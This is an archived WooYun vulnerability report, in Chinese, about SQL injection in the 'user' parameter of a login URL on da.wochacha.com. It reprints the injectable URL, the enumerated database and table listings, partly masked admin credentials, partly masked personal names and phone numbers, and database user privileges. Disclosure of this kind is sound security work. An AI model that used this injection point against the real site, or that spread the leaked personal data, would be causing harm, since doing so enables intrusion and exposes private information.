乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开
我查查某处SQL注入(涉及12库,675表) 大量信息泄露
http://da.wochacha.com/index.php/da/ajax/login?_dc=1438674485757&user=admin*&pwd=admin&page=1&start=0&limit=25
注入点,user 存在注入账号密码 的太多,我就不贴那了,
available databases [12]:[*] calpontsys[*] da[*] da_gcore[*] gcore[*] guser[*] infinidb_querystats[*] infinidb_vtable[*] information_schema[*] mysql[*] pa[*] test[*] wccda
Database: wccda[102 tables]+---------------------------------------+| da_action_function || da_activetime_analysis || da_advert_analysis || da_advert_discstarttime_analysis || da_advertperiod_analysis || da_antifake_analysis || da_antifakerate_analysis || da_antifakevoicomt_analysis || da_antifakevoiitemtop_analysis || da_baike_analysis || da_barcode_scanpv || da_buy_analysis || da_buy_summary || da_category1top100_analysis || da_collecttime_analysis || da_commodityprice_analysis || da_cpresult_analysis || da_datacity_analysis || da_datacollect_analysis || da_dist || da_experience_analysis || da_expodetail_analysis || da_expoitem_analysis || da_exposure_analysis || da_expressitem_analysis || da_expresstop_analysis || da_freebuydetail_analysis || da_freebuyitem_analysis || da_fshopcom_analysis || da_indexdetail_analysis || da_keywordsearch_analysis || da_lyg_analysis || da_model_analysis || da_networking_analysis || da_newpromotion_analysis || da_newpromotiondetail_analysis || da_nonamecheckweek_analysis || da_operators_analysis || da_orderdetail_analysis || da_os_analysis || da_othersdetail_analysis || da_othersitem_analysis || da_parameter_manager || da_pointdetail_analysis || da_pointitem_analysis || da_pricecompare_analysis || da_purchasemonthkeep_analysis || da_purchaseweekkeep_analysis || da_qrdetailpage_analysis || da_qrindexdetail_analysis || da_qrmake_analysis || da_qrscan_analysis || da_qrsoft_analysis || da_realtime_monitor || da_resolution_analysis || da_role || da_scan_analysis || da_scanbarcategory_analysis || da_scancommodity_analysis || da_seller_analysis || da_sellerdetail_analysis || da_servicedetail_analysis || da_serviceitem_analysis || da_shopassist_analysis || da_shopassistbartop_analysis || da_show_analysis || da_showbuy_analysis || da_soft_analysis || da_softdetail_analysis || da_softdown_analysis || da_softtopic_analysis || da_source || da_spnum_analysis || da_superdetail_analysis || da_supertop_analysis || da_tshopcom_analysis || da_user_analysis || da_usermodule_analysis || da_usrkeep_analysis || da_usrkeep_analysis_inf || da_usrlifecycle_analysis || da_usrregion_analysis || da_usrreturn_analysis || da_usrreturn_analysis_inf || da_version_manage || da_warning_analysis || da_zxdetail_analysis || da_zxmerchant_analysis || kpi_daily || log_report || lyg_page || newpromotion_page || statistic_function || statistic_function2 || supermarket_dg || supermarket_page || supermarket_sale || wcc_realtime_monitor || wcc_subjectbanner || wcc_version_manage || zxmerchant_page || zxmerchant_page_new |+---------------------------------------+Database: guser[1 table]+---------------------------------------+| wcc_subjectbanner |+---------------------------------------+Database: infinidb_querystats[3 tables]+---------------------------------------+| priority || querystats || user_priority |+---------------------------------------+Database: calpontsys[2 tables]+---------------------------------------+| syscolumn || systable |+---------------------------------------+Database: da[138 tables]+---------------------------------------+| ca_commoditypv_ctid || ca_crawlersalary_accuracy || ca_crawlersalary_addcommodity || ca_crawlersalary_attendencedaily || ca_crawlersalary_attendencemonth || ca_crawlersalary_barcodectid_top5000 || ca_crawlersalary_barcodestid || ca_crawlersalary_coveragectid || ca_crawlersalary_coveragestid || ca_crawlersalary_crawler || ca_crawlersalary_position || ca_crawlersalary_salary || ca_crawlersalary_salarysetting || ca_crawlersalary_user || ca_datacollect_analysis || da_action_function || da_activetime_analysis || da_advert_analysis || da_advert_analysis1 || da_advert_discstarttime_analysis || da_advertperiod_analysis || da_advertperiod_analysis1 || da_antifake_analysis || da_antifakerate_analysis || da_antifakevoicomt_analysis || da_antifakevoiitemtop_analysis || da_baike_analysis || da_barcode_scanpv || da_buy_analysis || da_buy_summary || da_category1top100_analysis || da_collecttime_analysis || da_commodityprice_analysis || da_cpresult_analysis || da_cpresult_analysis_old || da_datacity_analysis || da_datacollect_analysis || da_dist || da_experience_analysis || da_expodetail_analysis || da_expoitem_analysis || da_exposure_analysis || da_expressitem_analysis || da_expresstop_analysis || da_freebuydetail_analysis || da_freebuyitem_analysis || da_fshopcom_analysis || da_indexdetail_analysis || da_keywordsearch_analysis || da_model_analysis || da_networking_analysis || da_newpromotion_analysis || da_newpromotiondetail_analysis || da_nonamecheckweek_analysis || da_operators_analysis || da_orderdetail_analysis || da_os_analysis || da_othersdetail_analysis || da_othersitem_analysis || da_parameter_manager || da_pointdetail_analysis || da_pointitem_analysis || da_pricecompare_analysis || da_purchasemonthkeep_analysis || da_purchaseweekkeep_analysis || da_qrdetailpage_analysis || da_qrindexdetail_analysis || da_qrmake_analysis || da_qrscan_analysis || da_qrsoft_analysis || da_realtime_monitor || da_resolution_analysis || da_role || da_scan_analysis || da_scanbarcategory_analysis || da_scancommodity_analysis || da_seller_analysis || da_sellerdetail_analysis || da_servicedetail_analysis || da_serviceitem_analysis || da_sharedetail_analysis || da_shopassist_analysis || da_shopassistbartop_analysis || da_show_analysis || da_showbuy_analysis || da_soft_analysis || da_softdetail_analysis || da_softdown_analysis || da_softtopic_analysis || da_source || da_spnum_analysis || da_superdetail_analysis || da_supertop_analysis || da_tshopcom_analysis || da_user_analysis || da_usermodule_analysis || da_usrkeep_analysis || da_usrkeep_analysis2 || da_usrkeep_analysis_inf || da_usrkeepnew_analysis || da_usrlifecycle_analysis || da_usrregion_analysis || da_usrreturn_analysis || da_usrreturn_analysis_inf || da_version_manage || da_warning_analysis || da_warning_analysis2 || da_warning_analysis_copy || da_zxdetail_analysis || da_zxmerchant_analysis || gc_dist || gc_dist_merge || ip || ip_20150623 || ip_bak || ip_collect || ip_delta || ip_delta_20150610 || ip_delta_20150611 || ip_delta_20150615 || ip_delta_20150616 || iphone_change_amount || iphone_dist || kpi_daily || log_report || lyg_page || newdist || newpromotion_page || statistic_function || supermarket_dg || supermarket_page || supermarket_sale || t_barcode || wcc_realtime_monitor || wcc_subjectbanner || wcc_version_manage || zxmerchant_page || zxmerchant_page_new |+---------------------------------------+Database: pa[18 tables]+---------------------------------------+| pa_brand || pa_brand_downpri_analysis || pa_category2_analysis || pa_cgy2_index_analysis || pa_cgy2_unit_analysis || pa_cgy_goods_seqcmp_analysis || pa_city_minprice_analysis || pa_classify || pa_fastest_growth_goods_analysis || pa_para_statistics || pa_price_extract_data || pa_price_trend_analysis || pa_price_zone_analysis || pa_role || pa_store || pa_store_index_analysis || pa_stores_downpri_analysis || pa_unit_topprice_analysis |+---------------------------------------+Database: mysql[23 tables]+---------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+---------------------------------------+Database: test[32 tables]+---------------------------------------+| DA_ScanCommodity_Analysis || ad_analysis || ad_showset || barcode_top_dately || commoditypv_2014_07commodity || commoditypv_2014_07ctid || commoditypv_2014_08commodity || commoditypv_2014_08ctid || commoditypv_2014_09commodity || commoditypv_2014_09ctid || commoditypv_2014_10commodity || commoditypv_2014_10ctid || commoditypv_2014_11commodity || commoditypv_2014_11ctid || da_barcode_scanpv || da_barcode_scanpv1 || da_expoitem_analysis_test || da_expressitem_analysis || da_ip_collect || da_scan_analysis || da_usrkeep_analysis || ip_collect || ip_delta || linshiteste || newpromotion_category_pv || newtable1 || pa_unit_topprice_analysis || supermarket_sale || t_barcode || urid || user_point_2014 || user_point_all |+---------------------------------------+Database: da_gcore[1 table]+---------------------------------------+| wcc_audit_stat |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: gcore[327 tables]+---------------------------------------+| bk_baike || bk_barcode || ch_product || da_barcoderesult2 || da_test || dm_antifake || dm_antifake_comment || dm_antifake_detail || dm_antifake_useful || dm_commodity_anti || gc_banner || gc_brand || gc_brandcity || gc_cache_temp || gc_city || gc_classify || gc_code2barcode || gc_combrand || gc_commodity || gc_commodity_content || gc_commodity_extra || gc_commodity_history || gc_commodity_medicine || gc_commodity_tag || gc_commodity_update || gc_crawler || gc_crawler_correct || gc_crawler_date_report || gc_crawler_store || gc_datain_report || gc_dist || gc_favorite_commodity || gc_mall_adver || gc_mall_category || gc_mall_groupon || gc_mall_item || gc_mall_itemcategory || gc_manufacturer || gc_medicine || gc_medicine_tag || gc_plan || gc_point_exchange || gc_point_product || gc_point_product_store || gc_price || gc_price_archive || gc_price_archive2 || gc_price_cache || gc_price_cache_temp || gc_price_ref || gc_price_review || gc_price_tobecrawl || gc_product || gc_promotion || gc_promotion_cache || gc_promotion_detail || gc_promotioncity || gc_promotionstore || gc_province || gc_recommand || gc_report || gc_report_temp || gc_report_user || gc_scan_list || gc_show_merchant || gc_software || gc_store || gc_store_cooperate || gc_store_cover || gc_store_shadow || gc_store_test || gc_tag || gc_user_center || gc_user_correct || gc_user_point || gcgc_price_archive || home_item || lyg_activity || mall_products || mall_stores || mq_store_data || ofallmessage || qs_reportdetail || qs_subject || qs_subjectconnect || vendor_area || vendor_bussiness || vendor_cat || vendor_coupon || vendor_couponstore || vendor_couponuser || vendor_favorite || vendor_item || vendor_store || vendor_store0 || vendor_store1 || vendor_store_copy || vendor_user || vendor_userarea || wcc_360buy || wcc_360buy_tmp || wcc_antifake_media_comment || wcc_api_access || wcc_api_log || wcc_api_user || wcc_audit_stat || wcc_bannerposition || wcc_barcode_blacklist_business || wcc_barcode_image || wcc_brand_comment || wcc_bsactivitycommodity || wcc_bsbanner || wcc_bsbrand || wcc_bsbrandactivity || wcc_bsbrandsome || wcc_bscategory || wcc_bscategorymap || wcc_bscolumn || wcc_bscolumn_items || wcc_bscouponcode || wcc_bscouponsend || wcc_bsexplanation || wcc_bsgroupbuy || wcc_bsgroupstore || wcc_bsitem || wcc_bsitem_new || wcc_bsitemdetail || wcc_bsmerchant_addition || wcc_bsorder || wcc_bsorderdetail || wcc_bsorderlists || wcc_bspromotion || wcc_bsprostore || wcc_bsspike || wcc_bsstore || wcc_bssubcategory || wcc_buslines || wcc_byblacklists || wcc_bycard || wcc_bymergeorder || wcc_bynbstore || wcc_byneighbor || wcc_byorder || wcc_byorder_bak || wcc_byordercomment || wcc_byorderdetail || wcc_byorderhistory || wcc_byorderotherinfo || wcc_byplan || wcc_byprice || wcc_byprice_backup || wcc_byprice_history || wcc_bypricecache || wcc_byproduct_category || wcc_byrecomment || wcc_byroute || wcc_bystore || wcc_category || wcc_category_new || wcc_category_ref || wcc_category_ref_new || wcc_comment_extra || wcc_commodity_category || wcc_commodity_history || wcc_commodity_hot || wcc_commodity_media_comment || wcc_commodity_multi || wcc_commodity_pv || wcc_cplog || wcc_cpuser || wcc_crawlerpricecache || wcc_da_category || wcc_da_category_barcode || wcc_da_category_ref || wcc_hdorder || wcc_indexevent || wcc_indexevent_items || wcc_manubar_relationship || wcc_manufacturer_news || wcc_mergeorder || wcc_msorder || wcc_msorder_bak || wcc_msorderlists || wcc_msorderotherinfo || wcc_mspayment || wcc_name || wcc_namecompare_temp || wcc_namecompare_temp1 || wcc_namecompare_temp2 || wcc_ordermsgcount || wcc_orderstatus || wcc_pcrecommend || wcc_pcseo || wcc_pcshorturl || wcc_pczxitem || wcc_pm_cache || wcc_pm_cache_copy || wcc_pm_plan || wcc_pm_promotion_product || wcc_price_add || wcc_price_multi || wcc_price_ref || wcc_price_ref_blacklist || wcc_price_ref_check || wcc_price_state_enum || wcc_priceindex || wcc_product || wcc_product_barcode || wcc_product_category || wcc_product_image || wcc_product_info || wcc_product_recommend || wcc_product_recommend_group || wcc_product_tag || wcc_product_tag_old || wcc_promotion || wcc_promotion_activity || wcc_promotion_activityconnectstore || wcc_promotion_banner || wcc_promotion_bannerconnectactivity || wcc_promotion_bannerconnectcity || wcc_promotion_barcode_list || wcc_promotion_category || wcc_promotion_connect_store || wcc_promotion_contact || wcc_promotion_cornermark || wcc_promotion_event || wcc_promotion_event_contact || wcc_promotion_event_job || wcc_promotion_event_product || wcc_promotion_event_product_cache || wcc_promotion_event_product_log || wcc_promotion_event_store || wcc_promotion_pic || wcc_promotion_product_cache || wcc_promotion_store_list || wcc_qcoffshelves_barcode || wcc_qsreport || wcc_qsreportcategory || wcc_qsreportdetail || wcc_qssubject || wcc_qssubjectcategory || wcc_retail_address_mapping || wcc_retail_area || wcc_retail_category || wcc_retail_chatquickreply || wcc_retail_city_view || wcc_retail_column || wcc_retail_comment || wcc_retail_commodity || wcc_retail_commodity_promotion || wcc_retail_crawler || wcc_retail_driverecord || wcc_retail_invoice || wcc_retail_merchant_import || wcc_retail_message || wcc_retail_messagecity || wcc_retail_order || wcc_retail_order_detail || wcc_retail_order_log || wcc_retail_otherprice || wcc_retail_phone_dnd || wcc_retail_picture || wcc_retail_price || wcc_retail_purchase || wcc_retail_purchase_lastordertime || wcc_retail_schedule || wcc_retail_service || wcc_retail_spec || wcc_retail_textadvs || wcc_retail_voucher || wcc_retail_voucher_code || wcc_retail_voucher_order_connect || wcc_rmb_news || wcc_rmb_survey || wcc_rules || wcc_scan_rank || wcc_scan_tent || wcc_sgorder || wcc_slide_city_connect || wcc_slidebanner || wcc_software_category || wcc_store_busline || wcc_store_state_enum || wcc_store_url || wcc_subjectbanner || wcc_subscriptionstore || wcc_system_holiday || wcc_test || wcc_user_statistics || wcc_wherebuy || wcc_yihaodian || wcc_yihaodian_arthur || wcc_zxactivity || wcc_zxactivitylimit || wcc_zxactivitysend || wcc_zxactivitystore || wcc_zxback || wcc_zxcolumn || wcc_zxcolumn_items || wcc_zxcolumn_items_cache || wcc_zxexplaination || wcc_zximage || wcc_zxintroduction || wcc_zxitem || wcc_zxitem_audit || wcc_zxiteminfo || wcc_zxitemstore || wcc_zxmaterial || wcc_zxmerchant || wcc_zxmerchant_addition || wcc_zxmerchant_province || wcc_zxmerchant_shadow || wcc_zxmerchantaddition_history || wcc_zxnews || wcc_zxorder || wcc_zxorder_bak || wcc_zxorderaccount || wcc_zxorderdetail || wcc_zxorderlists || wcc_zxpayment || wcc_zxproduct || wcc_zxproductinfo || wcc_zxregister || wcc_zxshippingaddress || wcc_zxstore || wcc_zxuser |+---------------------------------------+
+----------+-------------+| Name | Passwd |+----------+-------------+| admin | s*******szz || da**** | da_***** |+----------+-------------+
丁双* | 1357719023*荣玲* | 1358409656*袁* | 1358879279*曾* | 1359400725*
[*] 'sibyl'@'116.228.88.226' [1]: privilege: SELECT[*] 'vinny'@'116.228.88.226' [1]: privilege: USAGE[*] 'web'@'116.228.88.226' [1]: privilege: USAGE
过滤
危害等级:无影响厂商忽略
忽略时间:2015-08-09 18:52
漏洞Rank:4 (WooYun评价)
暂无
